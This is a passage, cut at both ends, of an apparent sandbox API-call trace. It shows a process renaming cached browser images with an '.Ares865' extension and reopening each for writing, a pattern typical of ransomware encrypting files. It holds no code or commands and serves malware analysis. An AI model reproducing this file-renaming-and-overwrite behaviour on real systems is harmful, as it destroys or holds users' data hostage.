(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png.ares865"), dwFlags=0x1) returned 1 [0095.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdk44m[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=644) returned 1 [0095.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg.Ares865") returned 117 [0095.471] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.473] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11524) returned 1 [0095.476] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg.Ares865") returned 117 [0095.476] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.477] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2147) returned 1 [0095.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png.Ares865") returned 117 [0095.480] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png.ares865"), dwFlags=0x1) returned 1 [0095.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe7gle[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=693) returned 1 [0095.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg.Ares865") returned 117 [0095.486] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7323) returned 1 [0095.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg.Ares865") returned 117 [0095.491] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1794) returned 1 [0095.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg.Ares865") returned 117 [0095.495] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeddnm[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.496] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44200) returned 1 [0095.501] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg.Ares865") returned 117 [0095.501] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedpyr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.503] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1877) returned 1 [0095.506] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg.Ares865") returned 117 [0095.506] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbedqdv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7282) returned 1 [0095.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg.Ares865") returned 117 [0095.510] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2595) returned 1 [0095.515] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg.Ares865") returned 117 [0095.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.517] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7335) returned 1 [0095.520] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg.Ares865") returned 117 [0095.520] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.521] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2543) returned 1 [0095.524] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg.Ares865") returned 117 [0095.524] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetuf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.526] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2386) returned 1 [0095.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg.Ares865") returned 117 [0095.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeeu5u[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1961) returned 1 [0095.533] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg.Ares865") returned 117 [0095.534] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.535] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef306[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.535] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2159) returned 1 [0095.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg.Ares865") returned 117 [0095.539] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2088) returned 1 [0095.543] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg.Ares865") returned 117 [0095.543] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbbh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.544] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14432) returned 1 [0095.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg.Ares865") returned 117 [0095.547] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet 